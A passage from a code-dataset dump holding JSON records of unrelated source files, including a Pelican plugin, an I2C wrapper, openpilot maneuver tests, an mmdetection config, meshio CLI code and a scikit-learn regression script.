\"IncrementFieldList.cc\"\n\nnamespace Spheral {\n template class IncrementFieldList, Dim< %(ndim)s >::Scalar>;\n template class IncrementFieldList, Dim< %(ndim)s >::Vector>;\n template class IncrementFieldList, Dim< %(ndim)s >::Vector3d>;\n template class IncrementFieldList, Dim< %(ndim)s >::Tensor>;\n template class IncrementFieldList, Dim< %(ndim)s >::SymTensor>;\n}\n\"\"\"\n"} {"ext": "py", "sha": "1a2ed9391a43aef205a579841ea907a66b02a0bb", "content": "from pelican import signals\nfrom pelican.generators import ArticlesGenerator, PagesGenerator\n\n# Make sure than when a title breaks, there will never be\n# a single word \"alone\" on its line\n# Does not work if the last \"word\" of the title is an emoji\n# in the form of an image (like Twemoji)\n\n# Title has to be more than four words\n# in order to be considered\nSMART_BREAK_MIN_LEN = 4\n\n\ndef smart_break(document):\n # Get the number of words\n splited = document.title.split(' ')\n length = len(splited)\n\n if length > SMART_BREAK_MIN_LEN:\n # Join the last two elements with a non-breaking space\n end = ' '.join(splited[length - 2:])\n # Get the start of the title back\n start = ' '.join(splited[:length-2])\n\n # Glue the title back together\n final = f'{start} {end}'\n\n # Write to a custom property\n # Writing the title directly leads to   not being\n # interpreted at various places\n document.smart_title = final\n\n\ndef run(generators):\n for g in generators:\n if isinstance(g, ArticlesGenerator):\n for a in g.articles:\n smart_break(a)\n if isinstance(g, PagesGenerator):\n for p in g.pages:\n smart_break(p)\n\n\ndef register():\n signals.all_generators_finalized.connect(run)\n"} {"ext": "py", "sha": "1a2eda00fae388833afb0376528a47736a300622", "content": "from werkzeug.local import LocalStack, LocalProxy\n\n\ndef _find_bot():\n from .wx import get_bot\n top = _wx_ctx_stack.top\n if top is None:\n top = get_bot()\n _wx_ctx_stack.push(top)\n return top\n\n\n_wx_ctx_stack = LocalStack()\ncurrent_bot = LocalProxy(_find_bot)\n"} {"ext": "py", "sha": "1a2edb2174b9c85e952fd7d274a2017cc64b1a9d", "content": "_base_ = 'faster_rcnn_r50_fpn_mstrain_3x_coco.py'\nmodel = dict(\n backbone=dict(\n norm_cfg=dict(requires_grad=False),\n norm_eval=True,\n style='caffe',\n init_cfg=dict(\n type='Pretrained',\n checkpoint='open-mmlab://detectron2/resnet50_caffe')))\n\n# use caffe img_norm\nimg_norm_cfg = dict(\n mean=[103.530, 116.280, 123.675], std=[1.0, 1.0, 1.0], to_rgb=False)\ntrain_pipeline = [\n dict(type='LoadImageFromFile'),\n dict(type='LoadAnnotations', with_bbox=True),\n dict(\n type='Resize',\n img_scale=[(1333, 640), (1333, 800)],\n multiscale_mode='range',\n keep_ratio=True),\n dict(type='RandomFlip', flip_ratio=0.5),\n dict(type='Normalize', **img_norm_cfg),\n dict(type='Pad', size_divisor=32),\n dict(type='DefaultFormatBundle'),\n dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels']),\n]\ntest_pipeline = [\n dict(type='LoadImageFromFile'),\n dict(\n type='MultiScaleFlipAug',\n img_scale=(1333, 800),\n flip=False,\n transforms=[\n dict(type='Resize', keep_ratio=True),\n dict(type='RandomFlip'),\n dict(type='Normalize', **img_norm_cfg),\n dict(type='Pad', size_divisor=32),\n dict(type='ImageToTensor', keys=['img']),\n dict(type='Collect', keys=['img']),\n ])\n]\n\ndata = dict(\n train=dict(dataset=dict(pipeline=train_pipeline)),\n val=dict(pipeline=test_pipeline),\n test=dict(pipeline=test_pipeline))"} {"ext": "py", "sha": "1a2edbb39b797f4afb516ce7671752d1cdfac609", "content": "import smbus2 as smbus\nimport ctypes\n\n\nclass I2cdev:\n def __init__(self, a_bus=1):\n self.bus = smbus.SMBus(a_bus)\n\n # I2Cdev::I2Cdev() { }\n\n # void I2Cdev::initialize() {\n # bcm2835_init();\n # bcm2835_i2c_set_baudrate( i2c_baudrate );\n # }\n\n # /** Enable or disable I2C, \n # * @param isEnabled true = enable, false = disable\n # */\n # void I2Cdev::enable(bool isEnabled) {\n # if ( set_I2C_pins ){\n # if (isEnabled)\n # bcm2835_i2c_end();\n # else\n # bcm2835_i2c_begin() ;\n # }\n # }\n\n\n\n\n # /** Read a single bit from an 8-bit device register.\n # * @param devAddr I2C slave device address\n # * @param regAddr Register regAddr to read from\n # * @param bitNum Bit position to read (0-7)\n # * @param data Container for single bit value\n # * @return Status of read operation (true = success)\n # */\n # int8_t - uint8_t devAddr, uint8_t regAddr, uint8_t bitNum, uint8_t *data\n def readBit(self, devAddr, regAddr, bitNum):\n data = self.bus.read_byte_data(devAddr, regAddr)\n return data & (1 << bitNum)\n \n\n # /** Read multiple bits from an 8-bit device register.\n # * @param devAddr I2C slave device address\n # * @param regAddr Register regAddr to read from\n # * @param bitStart First bit position to read (0-7)\n # * @param length Number of bits to read (not more than 8)\n # * @param data Container for right-aligned value (i.e. '101' read from any bitStart position will equal 0x05)\n # * @return Status of read operation (true = success)\n # */\n # int8_t\n # def readBits(uint8_t devAddr, uint8_t regAddr, uint8_t bitStart, uint8_t length, uint8_t *data):\n # # // 01101001 read byte\n # # // 76543210 bit numbers\n # # // xxx args: bitStart=4, length=3\n # # // 010 masked\n # # // -> 010 shifted\n # bcm2835_i2c_setSlaveAddress(devAddr);\n # sendBuf[0] = regAddr;\n # uint8_t response = bcm2835_i2c_write_read_rs(sendBuf, 1, recvBuf, 1);\n # uint8_t b = (uint8_t) recvBuf[0];\n # if (response == BCM2835_I2C_REASON_OK) {\n # uint8_t mask = ((1 << length) - 1) << (bitStart - length + 1);\n # b &= mask;\n # b >>= (bitStart - length + 1);\n # *data = b;\n # }\n # return response == BCM2835_I2C_REASON_OK;\n \n def readBits(self, devAddr, a_reg_add, a_bit_start, a_length):\n byte = self.bus.read_byte_data(devAddr, a_reg_add)\n mask = ((1 << a_length) - 1) << (a_bit_start - a_length + 1)\n byte &= mask\n byte >>= a_bit_start - a_length + 1\n return byte\n\n # /** Read single byte from an 8-bit device register.\n # * @param devAddr I2C slave device address\n # * @param regAddr Register regAddr to read from\n # * @param data Container for byte value read from device\n # * @return Status of read operation (true = success)\n # */\n # int8_t - uint8_t devAddr, uint8_t regAddr, uint8_t *data\n def readByte(self, devAddr, regAddr):\n return self.bus.read_byte_data(devAddr, regAddr)\n\n # /** Read multiple bytes from an 8-bit device register.\n # * @param devAddr I2C slave device address\n # * @param regAddr First register regAddr to read from\n # * @param length Number of bytes to read\n # * @param data Buffer to store read data in\n # * @return I2C_TransferReturn_TypeDef http://downloads.energymicro.com/documentation/doxygen/group__I2C.html\n # */\n # int8_t - uint8_t devAddr, uint8_t regAddr, uint8_t length, uint8_t *data\n # def readBytes(devAddr, regAddr, length):\n # bcm2835_i2c_setSlaveAddress(devAddr);\n # sendBuf[0] = regAddr;\n # uint8_t response = bcm2835_i2c_write_read_rs(sendBuf, 1, recvBuf, length);\n # int i ;\n # for (i = 0; i < length ; i++) {\n # data[i] = (uint8_t) recvBuf[i];\n # }\n # return response == BCM2835_I2C_REASON_OK;\n def readBytes(self, devAddr, a_address, a_length):\n # if a_length > len(a_data_list):\n # print('read_bytes, length of passed list too short')\n # return a_data_list\n # Attempt to use the built in read bytes function in the adafruit lib\n # a_data_list = self.__bus.read_i2c_block_data(self.__dev_id, a_address,\n # a_length)\n # Attempt to bypass adafruit lib\n #a_data_list = self.__mpu.bus.read_i2c_block_data(0x68, a_address, a_length)\n #print('data' + str(a_data_list))\n a_data_list = list()\n for x in range(0, a_length):\n # print(\"x:{}\".format(x))\n a_data_list.append(self.bus.read_byte_data(devAddr, a_address + x))\n return a_data_list\n \n \n # /** Read single word from a 16-bit device register.\n # * @param devAddr I2C slave device address\n # * @param regAddr Register regAddr to read from\n # * @param data Container for word value read from device\n # * @return Status of read operation (true = success)\n # */\n # int8_t - uint8_t devAddr, uint8_t regAddr, uint16_t *data\n # def readWord(self, devAddr, regAddr):\n # return self.bus.read_word_data(devAddr, regAddr)\n\n # /** Read multiple words from a 16-bit device register.\n # * @param devAddr I2C slave device address\n # * @param regAddr First register regAddr to read from\n # * @param length Number of words to read\n # * @param data Buffer to store read data in\n # * @return Number of words read (-1 indicates failure)\n # */\n # int8_t \n # def readWords(uint8_t devAddr, uint8_t regAddr, uint8_t length, uint16_t *data):\n # bcm2835_i2c_setSlaveAddress(devAddr);\n # sendBuf[0] = regAddr;\n # uint8_t response = bcm2835_i2c_write_read_rs(sendBuf, 1, recvBuf, length*2 );\n # uint8_t i;\n # for (i = 0; i < length; i++) {\n # data[i] = (recvBuf[i*2] << 8) | recvBuf[i*2+1] ;\n # }\n # return response == BCM2835_I2C_REASON_OK ;\n\n # /** write a single bit in an 8-bit device register.\n # * @param devAddr I2C slave device address\n # * @param regAddr Register regAddr to write to\n # * @param bitNum Bit position to write (0-7)\n # * @param value New bit value to write\n # * @return Status of operation (true = success)\n # */\n # bool - uint8_t devAddr, uint8_t regAddr, uint8_t bitNum, uint8_t data\n def writeBit(self, devAddr, regAddr, bitNum, data):\n prev_data = self.bus.read_byte_data(devAddr, regAddr)\n next_data = 0\n if data != 0:\n next_data = (prev_data | (1 << bitNum))\n else:\n next_data = (prev_data & ~(1 << bitNum))\n self.bus.write_byte_data(devAddr, regAddr, next_data)\n # self.bus.write_byte_data(devAddr, regAddr, ctypes.c_int8(next_data).value)\n \n # def write_bit(self, devAddr, a_reg_add, a_bit_num, a_bit):\n # byte = self.bus.read_byte_data(self.__dev_id, a_reg_add)\n # if a_bit:\n # byte |= 1 << a_bit_num\n # else:\n # byte &= ~(1 << a_bit_num)\n # self.bus.write_byte_data(\n # self.__dev_id, a_reg_add, ctypes.c_int8(byte).value)\n \n \n \n\n # /** Write multiple bits in an 8-bit device register.\n # * @param devAddr I2C slave device address\n # * @param regAddr Register regAddr to write to\n # * @param bitStart First bit position to write (0-7)\n # * @param length Number of bits to write (not more than 8)\n # * @param data Right-aligned value to write\n # * @return Status of operation (true = success)\n # */\n # bool \n # def writeBits(uint8_t devAddr, uint8_t regAddr, uint8_t bitStart, uint8_t length, uint8_t data):\n # # // 010 value to write\n # # // 76543210 bit numbers\n # # // xxx args: bitStart=4, length=3\n # # // 00011100 mask byte\n # # // 10101111 original value (sample)\n # # // 10100011 original & ~mask\n # # // 10101011 masked | value\n # bcm2835_i2c_setSlaveAddress(devAddr);\n # # //first reading registery value\n # sendBuf[0] = regAddr;\n # uint8_t response = bcm2835_i2c_write_read_rs(sendBuf, 1, recvBuf, 1 );\n # if ( response == BCM2835_I2C_REASON_OK ) {\n # uint8_t b = recvBuf[0];\n # uint8_t mask = ((1 << length) - 1) << (bitStart - length + 1);\n # data <<= (bitStart - length + 1); // shift data into correct position\n # data &= mask; // zero all non-important bits in data\n # b &= ~(mask); // zero all important bits in existing byte\n # b |= data; // combine data with existing byte\n # sendBuf[1] = b ;\n # response = bcm2835_i2c_write(sendBuf, 2);\n # }\n # return response == BCM2835_I2C_REASON_OK;\n \n def writeBits(self, devAddr, a_reg_add, a_bit_start, a_length, a_data):\n byte = self.bus.read_byte_data(devAddr, a_reg_add)\n mask = ((1 << a_length) - 1) << (a_bit_start - a_length + 1)\n # Get data in position and zero all non-important bits in data\n a_data <<= a_bit_start - a_length + 1\n a_data &= mask\n # Clear all important bits in read byte and combine with data\n byte &= ~mask\n byte = byte | a_data\n # Write the data to the I2C device\n # self.__bus.write_byte_data(self.__dev_id, a_reg_add, ctypes.c_int8(byte).value)\n self.bus.write_byte_data(devAddr, a_reg_add, byte)\n\n # /** Write single byte to an 8-bit device register.\n # * @param devAddr I2C slave device address\n # * @param regAddr Register address to write to\n # * @param data New byte value to write\n # * @return Status of operation (true = success)\n # */\n # bool - uint8_t devAddr, uint8_t regAddr, uint8_t data\n def writeByte(self, devAddr, regAddr, data):\n self.bus.write_byte_data(devAddr, regAddr, data)\n\n # bool \n # def writeBytes(uint8_t devAddr, uint8_t regAddr, uint8_t length, uint8_t *data):\n # bcm2835_i2c_setSlaveAddress(devAddr);\n # sendBuf[0] = regAddr;\n # uint8_t i;\n # for (i = 0; i < length; i++) {\n # sendBuf[i+1] = data[i] ;\n # }\n # uint8_t response = bcm2835_i2c_write(sendBuf, 1+length);\n # return response == BCM2835_I2C_REASON_OK ;\n \n # bool - uint8_t devAddr, uint8_t regAddr, uint16_t data\n def writeWord(self, devAddr, regAddr, data):\n self.bus.write_word_data(devAddr, regAddr, data)\n\n # bool \n # def writeWords(uint8_t devAddr, uint8_t regAddr, uint8_t length, uint16_t *data):\n # bcm2835_i2c_setSlaveAddress(devAddr);\n # sendBuf[0] = regAddr;\n # uint8_t i;\n # for (i = 0; i < length; i++) {\n # sendBuf[1+2*i] = (uint8_t) (data[i] >> 8); //MSByte\n # sendBuf[2+2*i] = (uint8_t) (data[i] >> 0); //LSByte\n # }\n # uint8_t response = bcm2835_i2c_write(sendBuf, 1+2*length);\n # return response == BCM2835_I2C_REASON_OK ;\n"} {"ext": "py", "sha": "1a2edc555fdf1d04a6698fb3713254ffa32e7c81", "content": "def time_converter(string):\n string = string.split()\n hora = int(string[0][1])+(10*int(string[0][0]))\n if hora>=18:\n hora_pm = hora-12\n lista = [str(hora_pm), string[0][2], string[0][3], string[0][4], ' p.m.']\n lista = ''.join(lista)\n return lista\n else:\n if hora>=12:\n string.append(' p.m.')\n string = ''.join(string)\n return string\n else:\n if hora==0:\n lista = ['12', string[0][2], string[0][3], string[0][4], ' a.m.']\n string = ''.join(lista)\n return string\n elif hora<10 and hora!=0:\n string.append(' a.m.')\n string = ''.join(string)\n return string[1:]\n else:\n return string\n\nprint(time_converter('12:30'))\nprint(time_converter('09:00'))\nprint(time_converter('23:15'))\nprint(time_converter('00:30'))\nprint(time_converter('00:00'))"} {"ext": "py", "sha": "1a2edc63eae0a1495b0654d3138a54b6bd8f5a57", "content": "#!/usr/bin/env python3\nimport os\nos.environ['NOCRASH'] = '1'\n\nimport unittest\nimport matplotlib\nmatplotlib.use('svg')\n\nfrom selfdrive.config import Conversions as CV\nfrom selfdrive.car.honda.values import CruiseButtons as CB\nfrom selfdrive.test.longitudinal_maneuvers.maneuver import Maneuver\nfrom selfdrive.manager.process_config import managed_processes\nfrom common.file_helpers import mkdirs_exists_ok\nfrom common.params import Params\n\n\ndef check_no_collision(log):\n return min(log['d_rel']) > 0\n\n\ndef check_fcw(log):\n return any(log['fcw'])\n\n\ndef check_engaged(log):\n return log['controls_state_msgs'][-1][-1].active\n\n\nmaneuvers = [\n Maneuver(\n 'while cruising at 40 mph, change cruise speed to 50mph',\n duration=30.,\n initial_speed=40. * CV.MPH_TO_MS,\n cruise_button_presses=[(CB.DECEL_SET, 2.), (0, 2.3),\n (CB.RES_ACCEL, 10.), (0, 10.1),\n (CB.RES_ACCEL, 10.2), (0, 10.3)],\n checks=[check_engaged],\n ),\n Maneuver(\n 'while cruising at 60 mph, change cruise speed to 50mph',\n duration=30.,\n initial_speed=60. * CV.MPH_TO_MS,\n cruise_button_presses=[(CB.DECEL_SET, 2.), (0, 2.3),\n (CB.DECEL_SET, 10.), (0, 10.1),\n (CB.DECEL_SET, 10.2), (0, 10.3)],\n checks=[check_engaged],\n ),\n Maneuver(\n 'while cruising at 20mph, uphill grade of 10%',\n duration=25.,\n initial_speed=20. * CV.MPH_TO_MS,\n cruise_button_presses=[(CB.DECEL_SET, 1.2), (0, 1.3)],\n grade_values=[0., 0., .1],\n grade_breakpoints=[0., 10., 11.],\n checks=[check_engaged],\n ),\n Maneuver(\n 'while cruising at 20mph, downhill grade of -10%',\n duration=25.,\n initial_speed=20. * CV.MPH_TO_MS,\n cruise_button_presses=[(CB.DECEL_SET, 1.2), (0, 1.3)],\n grade_values=[0., 0., -.1],\n grade_breakpoints=[0., 10., 11.],\n checks=[check_engaged],\n ),\n Maneuver(\n 'approaching a 40mph car while cruising at 60mph from 100m away',\n duration=30.,\n initial_speed=60. * CV.MPH_TO_MS,\n lead_relevancy=True,\n initial_distance_lead=100.,\n speed_lead_values=[40. * CV.MPH_TO_MS, 40. * CV.MPH_TO_MS],\n speed_lead_breakpoints=[0., 100.],\n cruise_button_presses=[(CB.DECEL_SET, 1.2), (0, 1.3)],\n checks=[check_engaged, check_no_collision],\n ),\n Maneuver(\n 'approaching a 0mph car while cruising at 40mph from 150m away',\n duration=30.,\n initial_speed=40. * CV.MPH_TO_MS,\n lead_relevancy=True,\n initial_distance_lead=150.,\n speed_lead_values=[0. * CV.MPH_TO_MS, 0. * CV.MPH_TO_MS],\n speed_lead_breakpoints=[0., 100.],\n cruise_button_presses=[(CB.DECEL_SET, 1.2), (0, 1.3)],\n checks=[check_engaged, check_no_collision],\n ),\n Maneuver(\n 'steady state following a car at 20m/s, then lead decel to 0mph at 1m/s^2',\n duration=50.,\n initial_speed=20.,\n lead_relevancy=True,\n initial_distance_lead=35.,\n speed_lead_values=[20., 20., 0.],\n speed_lead_breakpoints=[0., 15., 35.0],\n cruise_button_presses=[(CB.DECEL_SET, 1.2), (0, 1.3)],\n checks=[check_engaged, check_no_collision],\n ),\n Maneuver(\n 'steady state following a car at 20m/s, then lead decel to 0mph at 2m/s^2',\n duration=50.,\n initial_speed=20.,\n lead_relevancy=True,\n initial_distance_lead=35.,\n speed_lead_values=[20., 20., 0.],\n speed_lead_breakpoints=[0., 15., 25.0],\n cruise_button_presses=[(CB.DECEL_SET, 1.2), (0, 1.3)],\n checks=[check_engaged, check_no_collision],\n ),\n Maneuver(\n 'steady state following a car at 20m/s, then lead decel to 0mph at 3m/s^2',\n duration=50.,\n initial_speed=20.,\n lead_relevancy=True,\n initial_distance_lead=35.,\n speed_lead_values=[20., 20., 0.],\n speed_lead_breakpoints=[0., 15., 21.66],\n cruise_button_presses=[(CB.DECEL_SET, 1.2), (0, 1.3)],\n checks=[check_engaged, check_fcw],\n ),\n Maneuver(\n 'steady state following a car at 20m/s, then lead decel to 0mph at 5m/s^2',\n duration=40.,\n initial_speed=20.,\n lead_relevancy=True,\n initial_distance_lead=35.,\n speed_lead_values=[20., 20., 0.],\n speed_lead_breakpoints=[0., 15., 19.],\n cruise_button_presses=[(CB.DECEL_SET, 1.2), (0, 1.3)],\n checks=[check_engaged, check_fcw],\n ),\n Maneuver(\n 'starting at 0mph, approaching a stopped car 100m away',\n duration=30.,\n initial_speed=0.,\n lead_relevancy=True,\n initial_distance_lead=100.,\n cruise_button_presses=[(CB.DECEL_SET, 1.2), (0, 1.3),\n (CB.RES_ACCEL, 1.4), (0.0, 1.5),\n (CB.RES_ACCEL, 1.6), (0.0, 1.7),\n (CB.RES_ACCEL, 1.8), (0.0, 1.9)],\n checks=[check_engaged, check_no_collision],\n ),\n Maneuver(\n \"following a car at 60mph, lead accel and decel at 0.5m/s^2 every 2s\",\n duration=25.,\n initial_speed=30.,\n lead_relevancy=True,\n initial_distance_lead=49.,\n speed_lead_values=[30., 30., 29., 31., 29., 31., 29.],\n speed_lead_breakpoints=[0., 6., 8., 12., 16., 20., 24.],\n cruise_button_presses=[(CB.DECEL_SET, 1.2), (0, 1.3),\n (CB.RES_ACCEL, 1.4), (0.0, 1.5),\n (CB.RES_ACCEL, 1.6), (0.0, 1.7)],\n checks=[check_engaged, check_no_collision],\n ),\n Maneuver(\n \"following a car at 10mph, stop and go at 1m/s2 lead dece1 and accel\",\n duration=70.,\n initial_speed=10.,\n lead_relevancy=True,\n initial_distance_lead=20.,\n speed_lead_values=[10., 0., 0., 10., 0., 10.],\n speed_lead_breakpoints=[10., 20., 30., 40., 50., 60.],\n cruise_button_presses=[(CB.DECEL_SET, 1.2), (0, 1.3),\n (CB.RES_ACCEL, 1.4), (0.0, 1.5),\n (CB.RES_ACCEL, 1.6), (0.0, 1.7)],\n checks=[check_engaged, check_no_collision],\n ),\n Maneuver(\n \"green light: stopped behind lead car, lead car accelerates at 1.5 m/s\",\n duration=30.,\n initial_speed=0.,\n lead_relevancy=True,\n initial_distance_lead=4.,\n speed_lead_values=[0, 0, 45],\n speed_lead_breakpoints=[0, 10., 40.],\n cruise_button_presses=[(CB.DECEL_SET, 1.2), (0, 1.3),\n (CB.RES_ACCEL, 1.4), (0.0, 1.5),\n (CB.RES_ACCEL, 1.6), (0.0, 1.7),\n (CB.RES_ACCEL, 1.8), (0.0, 1.9),\n (CB.RES_ACCEL, 2.0), (0.0, 2.1),\n (CB.RES_ACCEL, 2.2), (0.0, 2.3)],\n checks=[check_engaged, check_no_collision],\n ),\n Maneuver(\n \"stop and go with 1m/s2 lead decel and accel, with full stops\",\n duration=70.,\n initial_speed=0.,\n lead_relevancy=True,\n initial_distance_lead=20.,\n speed_lead_values=[10., 0., 0., 10., 0., 0.],\n speed_lead_breakpoints=[10., 20., 30., 40., 50., 60.],\n cruise_button_presses=[(CB.DECEL_SET, 1.2), (0, 1.3),\n (CB.RES_ACCEL, 1.4), (0.0, 1.5),\n (CB.RES_ACCEL, 1.6), (0.0, 1.7)],\n checks=[check_engaged, check_no_collision],\n ),\n Maneuver(\n \"stop and go with 1.5m/s2 lead accel and 3.3m/s^2 lead decel, with full stops\",\n duration=45.,\n initial_speed=0.,\n lead_relevancy=True,\n initial_distance_lead=20.,\n speed_lead_values=[10., 0., 0., 10., 0., 0.],\n speed_lead_breakpoints=[10., 13., 26., 33., 36., 45.],\n cruise_button_presses=[(CB.DECEL_SET, 1.2), (0, 1.3),\n (CB.RES_ACCEL, 1.4), (0.0, 1.5),\n (CB.RES_ACCEL, 1.6), (0.0, 1.7)],\n checks=[check_engaged, check_no_collision],\n ),\n Maneuver(\n \"accelerate from 20 while lead vehicle decelerates from 40 to 20 at 1m/s2\",\n duration=30.,\n initial_speed=10.,\n lead_relevancy=True,\n initial_distance_lead=10.,\n speed_lead_values=[20., 10.],\n speed_lead_breakpoints=[1., 11.],\n cruise_button_presses=[(CB.DECEL_SET, 1.2), (0, 1.3),\n (CB.RES_ACCEL, 1.4), (0.0, 1.5),\n (CB.RES_ACCEL, 1.6), (0.0, 1.7),\n (CB.RES_ACCEL, 1.8), (0.0, 1.9),\n (CB.RES_ACCEL, 2.0), (0.0, 2.1),\n (CB.RES_ACCEL, 2.2), (0.0, 2.3)],\n checks=[check_engaged, check_no_collision],\n ),\n Maneuver(\n \"accelerate from 20 while lead vehicle decelerates from 40 to 0 at 2m/s2\",\n duration=30.,\n initial_speed=10.,\n lead_relevancy=True,\n initial_distance_lead=10.,\n speed_lead_values=[20., 0.],\n speed_lead_breakpoints=[1., 11.],\n cruise_button_presses=[(CB.DECEL_SET, 1.2), (0, 1.3),\n (CB.RES_ACCEL, 1.4), (0.0, 1.5),\n (CB.RES_ACCEL, 1.6), (0.0, 1.7),\n (CB.RES_ACCEL, 1.8), (0.0, 1.9),\n (CB.RES_ACCEL, 2.0), (0.0, 2.1),\n (CB.RES_ACCEL, 2.2), (0.0, 2.3)],\n checks=[check_engaged, check_no_collision],\n ),\n Maneuver(\n \"fcw: traveling at 30 m/s and approaching lead traveling at 20m/s\",\n duration=15.,\n initial_speed=30.,\n lead_relevancy=True,\n initial_distance_lead=100.,\n speed_lead_values=[20.],\n speed_lead_breakpoints=[1.],\n cruise_button_presses=[],\n checks=[check_fcw],\n ),\n Maneuver(\n \"fcw: traveling at 20 m/s following a lead that decels from 20m/s to 0 at 1m/s2\",\n duration=18.,\n initial_speed=20.,\n lead_relevancy=True,\n initial_distance_lead=35.,\n speed_lead_values=[20., 0.],\n speed_lead_breakpoints=[3., 23.],\n cruise_button_presses=[],\n checks=[check_fcw],\n ),\n Maneuver(\n \"fcw: traveling at 20 m/s following a lead that decels from 20m/s to 0 at 3m/s2\",\n duration=13.,\n initial_speed=20.,\n lead_relevancy=True,\n initial_distance_lead=35.,\n speed_lead_values=[20., 0.],\n speed_lead_breakpoints=[3., 9.6],\n cruise_button_presses=[],\n checks=[check_fcw],\n ),\n Maneuver(\n \"fcw: traveling at 20 m/s following a lead that decels from 20m/s to 0 at 5m/s2\",\n duration=8.,\n initial_speed=20.,\n lead_relevancy=True,\n initial_distance_lead=35.,\n speed_lead_values=[20., 0.],\n speed_lead_breakpoints=[3., 7.],\n cruise_button_presses=[],\n checks=[check_fcw],\n )\n]\n\n\ndef setup_output():\n output_dir = os.path.join(os.getcwd(), 'out/longitudinal')\n if not os.path.exists(os.path.join(output_dir, \"index.html\")):\n # write test output header\n\n css_style = \"\"\"\n .maneuver_title {\n font-size: 24px;\n text-align: center;\n }\n .maneuver_graph {\n width: 100%;\n }\n \"\"\"\n\n view_html = \"\" % (css_style,)\n for i, man in enumerate(maneuvers):\n view_html += \"\" % (man.title,)\n for c in ['distance.svg', 'speeds.svg', 'acceleration.svg', 'pedals.svg', 'pid.svg']:\n view_html += \"\" % (os.path.join(\"maneuver\" + str(i + 1).zfill(2), c), )\n view_html += \"\"\n\n mkdirs_exists_ok(output_dir)\n with open(os.path.join(output_dir, \"index.html\"), \"w\") as f:\n f.write(view_html)\n\n\nclass LongitudinalControl(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n os.environ['SIMULATION'] = \"1\"\n os.environ['SKIP_FW_QUERY'] = \"1\"\n os.environ['NO_CAN_TIMEOUT'] = \"1\"\n\n setup_output()\n\n params = Params()\n params.clear_all()\n params.put_bool(\"Passive\", bool(os.getenv(\"PASSIVE\")))\n params.put_bool(\"OpenpilotEnabledToggle\", True)\n params.put_bool(\"CommunityFeaturesToggle\", True)\n\n # hack\n def test_longitudinal_setup(self):\n pass\n\n\ndef run_maneuver_worker(k):\n man = maneuvers[k]\n output_dir = os.path.join(os.getcwd(), 'out/longitudinal')\n\n def run(self):\n print(man.title)\n valid = False\n\n for _ in range(3):\n managed_processes['radard'].start()\n managed_processes['controlsd'].start()\n managed_processes['plannerd'].start()\n\n plot, valid = man.evaluate()\n plot.write_plot(output_dir, \"maneuver\" + str(k + 1).zfill(2))\n\n managed_processes['radard'].stop()\n managed_processes['controlsd'].stop()\n managed_processes['plannerd'].stop()\n\n if valid:\n break\n\n self.assertTrue(valid)\n\n return run\n\n\nfor k in range(len(maneuvers)):\n setattr(LongitudinalControl, \"test_longitudinal_maneuvers_%d\" % (k + 1), run_maneuver_worker(k))\n\nif __name__ == \"__main__\":\n unittest.main(failfast=True)\n"} {"ext": "py", "sha": "1a2edd21b8b9d28d0c8c69efd0ead187dc60aed9", "content": "# -*- coding: utf-8 -*-\n\nfrom sqlalchemy import Column, ForeignKey, Integer, Text\n\nfrom pokr.database import Base\n\n\nclass MeetingAttendee(Base):\n __tablename__ = 'meeting_attendee'\n\n id = Column(Integer, autoincrement=True, primary_key=True)\n meeting_id = Column(ForeignKey('meeting.id'), nullable=False, index=True)\n person_id = Column(ForeignKey('person.id'), nullable=False, index=True)\n\n"} {"ext": "py", "sha": "1a2edd30755631a304b9ffae0330b4db1f1274e8", "content": "import numpy as np\n\nfrom .._helpers import _writer_map, read, reader_map, write\n\n\ndef add_args(parser):\n parser.add_argument(\"infile\", type=str, help=\"mesh file to be read from\")\n parser.add_argument(\n \"--input-format\",\n \"-i\",\n type=str,\n choices=sorted(list(reader_map.keys())),\n help=\"input file format\",\n default=None,\n )\n parser.add_argument(\n \"--output-format\",\n \"-o\",\n type=str,\n choices=sorted(list(_writer_map.keys())),\n help=\"output file format\",\n default=None,\n )\n parser.add_argument(\n \"--ascii\",\n \"-a\",\n action=\"store_true\",\n help=\"write in ASCII format variant (where applicable, default: binary)\",\n )\n parser.add_argument(\"outfile\", type=str, help=\"mesh file to be written to\")\n parser.add_argument(\n \"--float-format\",\n \"-f\",\n type=str,\n help=\"float format used in output ASCII files (default: .16e)\",\n )\n parser.add_argument(\n \"--sets-to-int-data\",\n \"-s\",\n action=\"store_true\",\n help=\"if possible, convert sets to integer data (useful if the output type does not support sets)\",\n )\n parser.add_argument(\n \"--int-data-to-sets\",\n \"-d\",\n action=\"store_true\",\n help=\"if possible, convert integer data to sets (useful if the output type does not support integer data)\",\n )\n\n\ndef convert(args):\n # read mesh data\n mesh = read(args.infile, file_format=args.input_format)\n\n # Some converters (like VTK) require `points` to be contiguous.\n mesh.points = np.ascontiguousarray(mesh.points)\n\n if args.sets_to_int_data:\n mesh.point_sets_to_data()\n mesh.cell_sets_to_data()\n\n if args.int_data_to_sets:\n for key in mesh.point_data:\n mesh.point_data_to_sets(key)\n for key in mesh.cell_data:\n mesh.cell_data_to_sets(key)\n\n # write it out\n kwargs = {\"file_format\": args.output_format}\n if args.float_format is not None:\n kwargs[\"float_fmt\"] = args.float_format\n if args.ascii:\n kwargs[\"binary\"] = False\n\n write(args.outfile, mesh, **kwargs)\n"} {"ext": "py", "sha": "1a2ede8ccc24684c26563373e68bc1984c47623a", "content": "from sklearn.datasets import load_boston\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.model_selection import cross_val_predict, cross_val_score\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n\n# load the data set we'll be working with. In this case the Boston housing\nboston = load_boston()\nboston_df = pd.DataFrame(data=boston.data, columns=boston.feature_names) # get it into a pandas data frame\ny = pd.DataFrame(data=boston.data) # get it into a pandas data frame\nX = boston_df[['LSTAT', 'AGE']]\n# boston_df.describe() # take a look at the data\nboston = None # help garbage collector\n\n# Task 2) make a linear regression model with LSTAT+AGE to predict median value\nlr1 = LinearRegression() # create the object\nlr1.fit(X, y)\n\n# cross_val_predict returns an array of the same size as `y` where each entry\n# is a prediction obtained by cross validation:\npredicted = cross_val_predict(lr1, X, y, cv=10)\nscores = cross_val_score(lr1, X, y, cv=10)\nprint(\"Accuracy: %0.2f (+/- %0.2f)\" % (scores.mean(), scores.std() * 2))\n\nfig, ax = plt.subplots()\nax.scatter(y, predicted, edgecolors=(0, 0, 0)) # predicted values\nax.plot([y.min(), y.max()], [y.min(), y.max()], 'k--', lw=4) # regression line\nax.set_xlabel('Measured')\nax.set_ylabel('Predicted')\n# uncomment line below to show graph\nplt.show()\n"} {"ext": "py", "sha": 